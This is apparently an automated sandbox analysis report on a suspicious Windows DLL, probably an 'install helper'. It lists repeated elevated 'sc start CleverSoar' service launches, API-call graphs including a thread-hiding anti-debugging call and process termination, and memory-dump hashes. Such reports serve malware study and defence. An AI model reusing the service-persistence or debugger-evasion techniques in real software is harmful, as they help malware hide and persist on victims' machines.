                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:97
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:98
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:99
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:100
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:101
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:102
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:103
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:104
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:105
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:106
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:266
                                                        Start time:01:53:08
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\Conhost.exe
                                                        Wow64 process (32bit):
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:
                                                        Has administrator privileges:
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false


                                                          Execution Graph

                                                          Execution Coverage:1.6%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:15.4%
                                                          Total number of Nodes:824
                                                          Total number of Limit Nodes:9
18 API calls 100873->100876 100874->100860 100875->100860 100876->100874 100878 6c6a49c9 100877->100878 100882 6c6a49cf 100877->100882 100880 6c6a6b23 __Getctype 6 API calls 100878->100880 100879 6c6a6b62 __Getctype 6 API calls 100881 6c6a49ed 100879->100881 100880->100882 100883 6c6a49d5 SetLastError 100881->100883 100884 6c6a49f1 100881->100884 100882->100879 100882->100883 100890 6c6a4a69 100883->100890 100891 6c6a4a63 100883->100891 100885 6c6a71e5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 100884->100885 100887 6c6a49fd 100885->100887 100888 6c6a4a1c 100887->100888 100889 6c6a4a05 100887->100889 100892 6c6a6b62 __Getctype 6 API calls 100888->100892 100893 6c6a6b62 __Getctype 6 API calls 100889->100893 100894 6c6a0ac9 __Getctype 35 API calls 100890->100894 100891->100861 100891->100864 100896 6c6a4a28 100892->100896 100897 6c6a4a13 100893->100897 100895 6c6a4a6e 100894->100895 100898 6c6a4a2c 100896->100898 100899 6c6a4a3d 100896->100899 100901 6c6a47bb _free HeapFree GetLastError 100897->100901 100900 6c6a6b62 __Getctype 6 API calls 100898->100900 100903 6c6a47bb _free HeapFree GetLastError 100899->100903 100900->100897 100902 6c6a4a19 100901->100902 100902->100883 100903->100902 100904->100799 100905->100806 100907 6c6ab9cd __wsopen_s 100906->100907 100915 6c6b1990 EnterCriticalSection 100907->100915 100909 6c6ab9db 100910 6c6ab925 __wsopen_s 21 API calls 100909->100910 100911 6c6aba08 100909->100911 100910->100911 100916 6c6aba41 LeaveCriticalSection __wsopen_s 100911->100916 100913 6c6aba2a 100913->100812 100914->100812 100915->100909 100916->100913 100917->100410 100918->100413 100919->100410 100920->100410 100921->100410 100923 6c56022e 100922->100923 100924 6c5370c4 100923->100924 100929 6c6a17db 100923->100929 100924->100422 100926->100424 100927->100426 100928->100428 100930 6c6a17e9 100929->100930 100931 6c6a1806 100929->100931 100930->100931 100932 6c6a180a 100930->100932 100933 6c6a17f6 100930->100933 100931->100923 100937 
6c6a1a02 100932->100937 100945 6c6a0120 18 API calls __wsopen_s 100933->100945 100938 6c6a1a0e __wsopen_s 100937->100938 100946 6c69c5a9 EnterCriticalSection 100938->100946 100940 6c6a1a1c 100947 6c6a19bf 100940->100947 100944 6c6a183c 100944->100923 100945->100931 100946->100940 100955 6c6a85a6 100947->100955 100953 6c6a19f9 100954 6c6a1a51 LeaveCriticalSection 100953->100954 100954->100944 100956 6c6a9c60 18 API calls 100955->100956 100957 6c6a85b7 100956->100957 100958 6c6b19e5 __wsopen_s 18 API calls 100957->100958 100960 6c6a85bd __wsopen_s 100958->100960 100959 6c6a19d3 100962 6c6a183e 100959->100962 100960->100959 100972 6c6a47bb HeapFree GetLastError _free 100960->100972 100964 6c6a1850 100962->100964 100966 6c6a186e 100962->100966 100963 6c6a185e 100973 6c6a0120 18 API calls __wsopen_s 100963->100973 100964->100963 100964->100966 100969 6c6a1886 _Yarn 100964->100969 100971 6c6a8659 62 API calls 100966->100971 100967 6c6a0cb9 62 API calls 100967->100969 100968 6c6a9c60 18 API calls 100968->100969 100969->100966 100969->100967 100969->100968 100970 6c6abb6c __wsopen_s 62 API calls 100969->100970 100970->100969 100971->100953 100972->100959 100973->100966 100975 6c696025 100974->100975 100976 6c562020 52 API calls 100975->100976 100977 6c6960c6 100976->100977 100978 6c696a43 std::_Facet_Register 4 API calls 100977->100978 100979 6c6960fe 100978->100979 100980 6c697327 43 API calls 100979->100980 100981 6c696112 100980->100981 100982 6c561d90 89 API calls 100981->100982 100983 6c6961bb 100982->100983 100984 6c6961ec 100983->100984 101026 6c562250 30 API calls 100983->101026 100984->100444 100986 6c696226 101027 6c5626e0 24 API calls 4 library calls 100986->101027 100988 6c696238 101028 6c699379 RaiseException 100988->101028 100990 6c69624d 100991 6c55e010 67 API calls 100990->100991 100992 6c69625f 100991->100992 100992->100444 100994 6c69638d 100993->100994 101029 6c6965a0 100994->101029 100996 6c69647c 100996->100455 101000 6c6963a5 101000->100996 101047 
6c562250 30 API calls 101000->101047 101048 6c5626e0 24 API calls 4 library calls 101000->101048 101049 6c699379 RaiseException 101000->101049 101002 6c57203f 101001->101002 101005 6c572053 101002->101005 101058 6c563560 32 API calls std::_Xinvalid_argument 101002->101058 101007 6c57210e 101005->101007 101060 6c562250 30 API calls 101005->101060 101061 6c5626e0 24 API calls 4 library calls 101005->101061 101062 6c699379 RaiseException 101005->101062 101010 6c572121 101007->101010 101059 6c5637e0 32 API calls std::_Xinvalid_argument 101007->101059 101010->100455 101012 6c695b9e 101011->101012 101019 6c695bd1 101011->101019 101014 6c5601f0 64 API calls 101012->101014 101013 6c695c83 101013->100456 101015 6c695bc4 101014->101015 101017 6c6a0b18 67 API calls 101015->101017 101017->101019 101018 6c695cae 101064 6c562340 24 API calls 101018->101064 101019->101013 101063 6c562250 30 API calls 101019->101063 101021 6c695cbe 101065 6c699379 RaiseException 101021->101065 101023 6c695cc9 101024 6c55e010 67 API calls 101023->101024 101025 6c695d22 std::ios_base::_Ios_base_dtor 101024->101025 101025->100456 101026->100986 101027->100988 101028->100990 101030 6c696608 101029->101030 101031 6c6965dc 101029->101031 101038 6c696619 101030->101038 101050 6c563560 32 API calls std::_Xinvalid_argument 101030->101050 101032 6c696601 101031->101032 101052 6c562250 30 API calls 101031->101052 101032->101000 101035 6c6967e8 101053 6c562340 24 API calls 101035->101053 101037 6c6967f7 101054 6c699379 RaiseException 101037->101054 101038->101032 101051 6c562f60 42 API calls 4 library calls 101038->101051 101041 6c696653 101041->101032 101055 6c562250 30 API calls 101041->101055 101043 6c696827 101056 6c562340 24 API calls 101043->101056 101045 6c69683d 101057 6c699379 RaiseException 101045->101057 101047->101000 101048->101000 101049->101000 101050->101038 101051->101041 101052->101035 101053->101037 101054->101041 101055->101043 101056->101045 101057->101032 101058->101005 101059->101010 
101060->101005 101061->101005 101062->101005 101063->101018 101064->101021 101065->101023 101066 6c513d62 101068 6c513bc0 101066->101068 101067 6c513e8a GetCurrentThread NtSetInformationThread 101069 6c513eea 101067->101069 101068->101067 101070 6c524a27 101071 6c524a5d _strlen 101070->101071 101072 6c53639e 101071->101072 101073 6c525b58 101071->101073 101074 6c525b6f 101071->101074 101078 6c525b09 _Yarn 101071->101078 101161 6c6a0130 18 API calls 2 library calls 101072->101161 101076 6c696a43 std::_Facet_Register 4 API calls 101073->101076 101077 6c696a43 std::_Facet_Register 4 API calls 101074->101077 101076->101078 101077->101078 101079 6c68aec0 2 API calls 101078->101079 101081 6c525bad std::ios_base::_Ios_base_dtor 101079->101081 101080 6c694ff0 4 API calls 101090 6c5261cb _strlen 101080->101090 101081->101072 101081->101080 101084 6c529ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 101081->101084 101082 6c696a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101082->101084 101083 6c68aec0 2 API calls 101083->101084 101084->101072 101084->101082 101084->101083 101085 6c52a292 Sleep 101084->101085 101104 6c52e619 101084->101104 101111 6c529bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 101085->101111 101086 6c526624 101089 6c696a43 std::_Facet_Register 4 API calls 101086->101089 101087 6c52660d 101088 6c696a43 std::_Facet_Register 4 API calls 101087->101088 101095 6c5265bc _Yarn _strlen 101088->101095 101089->101095 101090->101072 101090->101086 101090->101087 101090->101095 101091 6c694ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 101091->101111 101092 6c529bbd GetCurrentProcess TerminateProcess 101092->101084 101093 6c5363b2 101162 6c5115e0 18 API calls std::ios_base::_Ios_base_dtor 101093->101162 101095->101093 101097 6c526970 101095->101097 101098 6c526989 101095->101098 101101 6c526920 _Yarn 101095->101101 101096 6c5364f8 101099 6c696a43 std::_Facet_Register 4 API calls 
101097->101099 101100 6c696a43 std::_Facet_Register 4 API calls 101098->101100 101099->101101 101100->101101 101102 6c695960 104 API calls 101101->101102 101105 6c5269d6 std::ios_base::_Ios_base_dtor _strlen 101102->101105 101103 6c52f243 CreateFileA 101112 6c52f2a7 101103->101112 101104->101103 101105->101072 101106 6c526dd2 101105->101106 101107 6c526dbb 101105->101107 101113 6c526d69 _Yarn _strlen 101105->101113 101109 6c696a43 std::_Facet_Register 4 API calls 101106->101109 101108 6c696a43 std::_Facet_Register 4 API calls 101107->101108 101108->101113 101109->101113 101110 6c5302ca 101111->101072 101111->101084 101111->101091 101111->101092 101111->101093 101133 6c696a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101111->101133 101151 6c695960 104 API calls 101111->101151 101112->101110 101119 6c5302ac GetCurrentProcess TerminateProcess 101112->101119 101113->101093 101114 6c527440 101113->101114 101115 6c527427 101113->101115 101120 6c5273da _Yarn 101113->101120 101117 6c696a43 std::_Facet_Register 4 API calls 101114->101117 101116 6c696a43 std::_Facet_Register 4 API calls 101115->101116 101116->101120 101117->101120 101118 6c695960 104 API calls 101121 6c52748d std::ios_base::_Ios_base_dtor _strlen 101118->101121 101119->101110 101120->101118 101121->101072 101122 6c527991 101121->101122 101123 6c5279a8 101121->101123 101126 6c527940 _Yarn _strlen 101121->101126 101124 6c696a43 std::_Facet_Register 4 API calls 101122->101124 101125 6c696a43 std::_Facet_Register 4 API calls 101123->101125 101124->101126 101125->101126 101126->101093 101127 6c527de2 101126->101127 101128 6c527dc9 101126->101128 101131 6c527d7c _Yarn 101126->101131 101130 6c696a43 std::_Facet_Register 4 API calls 101127->101130 101129 6c696a43 std::_Facet_Register 4 API calls 101128->101129 101129->101131 101130->101131 101132 6c695960 104 API calls 101131->101132 101134 6c527e2f std::ios_base::_Ios_base_dtor _strlen 101132->101134 
101133->101111 101134->101072 101135 6c5285a8 101134->101135 101136 6c5285bf 101134->101136 101139 6c528556 _Yarn _strlen 101134->101139 101137 6c696a43 std::_Facet_Register 4 API calls 101135->101137 101138 6c696a43 std::_Facet_Register 4 API calls 101136->101138 101137->101139 101138->101139 101139->101093 101140 6c528983 101139->101140 101141 6c52896a 101139->101141 101144 6c52891d _Yarn 101139->101144 101143 6c696a43 std::_Facet_Register 4 API calls 101140->101143 101142 6c696a43 std::_Facet_Register 4 API calls 101141->101142 101142->101144 101143->101144 101145 6c695960 104 API calls 101144->101145 101148 6c5289d0 std::ios_base::_Ios_base_dtor _strlen 101145->101148 101146 6c528f36 101150 6c696a43 std::_Facet_Register 4 API calls 101146->101150 101147 6c528f1f 101149 6c696a43 std::_Facet_Register 4 API calls 101147->101149 101148->101072 101148->101146 101148->101147 101152 6c528ecd _Yarn _strlen 101148->101152 101149->101152 101150->101152 101151->101111 101152->101093 101153 6c529354 101152->101153 101154 6c52936d 101152->101154 101157 6c529307 _Yarn 101152->101157 101155 6c696a43 std::_Facet_Register 4 API calls 101153->101155 101156 6c696a43 std::_Facet_Register 4 API calls 101154->101156 101155->101157 101156->101157 101158 6c695960 104 API calls 101157->101158 101160 6c5293ba std::ios_base::_Ios_base_dtor 101158->101160 101159 6c694ff0 4 API calls 101159->101084 101160->101072 101160->101159 101162->101096 101163 6c69ef3f 101164 6c69ef4b __wsopen_s 101163->101164 101165 6c69ef5f 101164->101165 101166 6c69ef52 GetLastError ExitThread 101164->101166 101167 6c6a49b2 __Getctype 37 API calls 101165->101167 101168 6c69ef64 101167->101168 101175 6c6a9d66 101168->101175 101171 6c69ef7b 101181 6c69eeaa 16 API calls 2 library calls 101171->101181 101174 6c69ef9d 101176 6c6a9d78 GetPEB 101175->101176 101177 6c69ef6f 101175->101177 101176->101177 101178 6c6a9d8b 101176->101178 101177->101171 101180 6c6a6d6f 5 API calls std::_Lockit::_Lockit 101177->101180 101182 
6c6a6e18 5 API calls std::_Lockit::_Lockit 101178->101182 101180->101171 101181->101174 101182->101177 101183 6c6acad3 101185 6c6acae5 __dosmaperr 101183->101185 101186 6c6acafd 101183->101186 101184 6c6acb48 __dosmaperr 101225 6c6a0120 18 API calls __wsopen_s 101184->101225 101186->101184 101186->101185 101188 6c6acb77 101186->101188 101189 6c6acb90 101188->101189 101190 6c6acbab __dosmaperr 101188->101190 101193 6c6acbe7 __wsopen_s 101188->101193 101189->101190 101192 6c6acb95 101189->101192 101218 6c6a0120 18 API calls __wsopen_s 101190->101218 101191 6c6b19e5 __wsopen_s 18 API calls 101194 6c6acd3e 101191->101194 101192->101191 101219 6c6a47bb HeapFree GetLastError _free 101193->101219 101198 6c6acdb4 101194->101198 101201 6c6acd57 GetConsoleMode 101194->101201 101196 6c6acc07 101220 6c6a47bb HeapFree GetLastError _free 101196->101220 101200 6c6acdb8 ReadFile 101198->101200 101203 6c6ace2c GetLastError 101200->101203 101204 6c6acdd2 101200->101204 101201->101198 101205 6c6acd68 101201->101205 101202 6c6acc0e 101216 6c6acbc2 __dosmaperr __wsopen_s 101202->101216 101221 6c6aac69 20 API calls __wsopen_s 101202->101221 101203->101216 101204->101203 101206 6c6acda9 101204->101206 101205->101200 101207 6c6acd6e ReadConsoleW 101205->101207 101211 6c6ace0e 101206->101211 101212 6c6acdf7 101206->101212 101206->101216 101207->101206 101210 6c6acd8a GetLastError 101207->101210 101210->101216 101213 6c6ace25 101211->101213 101211->101216 101223 6c6acefe 23 API calls 3 library calls 101212->101223 101224 6c6ad1b6 21 API calls __wsopen_s 101213->101224 101222 6c6a47bb HeapFree GetLastError _free 101216->101222 101217 6c6ace2a 101217->101216 101218->101216 101219->101196 101220->101202 101221->101192 101222->101185 101223->101216 101224->101217 101225->101185
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: HR^
                                                          • API String ID: 4218353326-1341859651
                                                          • Opcode ID: 3bf71dd69b10a85981a87ef39fb9859980e1ac88b4eaac86406c612b601c0118
                                                          • Instruction ID: 4c41baa49780f0648aa24ae27c4d576211e340dc1d0053a22678b6eb280932c5
                                                          • Opcode Fuzzy Hash: 3bf71dd69b10a85981a87ef39fb9859980e1ac88b4eaac86406c612b601c0118
                                                          • Instruction Fuzzy Hash: 9F741771644B028FD728CF28CCD4695B7F3EF95318B198A2DC0968BE95E778B54ACB40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: }jk$;T55$L@^
                                                          • API String ID: 0-4218709813
                                                          • Opcode ID: 339f7ae9d65dc40c117d0858df137348528138877e3b81ed636ec222940047ed
                                                          • Instruction ID: 7f631d38284ef44c6552dff79c76c5247ef0eb3c9440f0f523cc9d7c3c016cdb
                                                          • Opcode Fuzzy Hash: 339f7ae9d65dc40c117d0858df137348528138877e3b81ed636ec222940047ed
                                                          • Instruction Fuzzy Hash: 0D34F8716457018FC728CF28CCD0A96B7E3EFD5314B198A6DC0968BB95EB78B54ACB40

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C69524E
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CreateSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3332741929-0
                                                          • Opcode ID: 6cc0fa0a3cbe23298e3a0ebbf47f68b3d6749cb9eca3e52c3a0c50b07df1b050
                                                          • Instruction ID: a10652c9d707486a5f485a8c5677cc67c28ad977feee357a04057c5319f0df60
                                                          • Opcode Fuzzy Hash: 6cc0fa0a3cbe23298e3a0ebbf47f68b3d6749cb9eca3e52c3a0c50b07df1b050
                                                          • Instruction Fuzzy Hash: D0318D746083029FC7109F68C888B0ABBF4AF96755F904A2EF598C73A0E371D8498B57

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca47735203a88273f2ece6ce78dfd4134941517f0259262ed964c7d6eb79ca88
                                                          • Instruction ID: 67623dd26f4b07e652d228c1d582eda8eb8f6105a262ef6ae1989dd6dea8a4f8
                                                          • Opcode Fuzzy Hash: ca47735203a88273f2ece6ce78dfd4134941517f0259262ed964c7d6eb79ca88
                                                          • Instruction Fuzzy Hash: CE32F532249B018FD324CF28C8E4695B7E3EFD13247698A6DC0EA4BE55D775B44ACB50

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: e8d13ded9ad5d0aa9e76120b6df117af50424a42b660da4f13ad0ea83cb2f897
                                                          • Instruction ID: dd25991c3e18d6cd4c7d6b6dbf73d93ae8197e0727952f72187676783a56becc
                                                          • Opcode Fuzzy Hash: e8d13ded9ad5d0aa9e76120b6df117af50424a42b660da4f13ad0ea83cb2f897
                                                          • Instruction Fuzzy Hash: 7751F0711497018FE320CF28C898785B7A3AF92324F698E1DC0E65BE95DB74B44A8B81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 02333bae1826f2ca310cefedad9af18c9308daf8e16e135f3cabba540d1c6178
                                                          • Instruction ID: 01874fa36daee185fd8d6fddffbf3d972a67f4a4f0abfdf96766d0df7473e26a
                                                          • Opcode Fuzzy Hash: 02333bae1826f2ca310cefedad9af18c9308daf8e16e135f3cabba540d1c6178
                                                          • Instruction Fuzzy Hash: B351E271108B018FE320CF29C898795B7A3BF96324F658F1DC0E65BE95DB71B44A8B91
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 6C513E9D
                                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C513EAA
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Thread$CurrentInformation
                                                          • String ID:
                                                          • API String ID: 1650627709-0
                                                          • Opcode ID: 2aa522b5ebb439bcd979fbae0c30a490788c47600126530c878949cb2d2a5458
                                                          • Instruction ID: e8de23f92bffde381e2be94cd16af3dedf55b2bfbfb9b190b206d201ff39393a
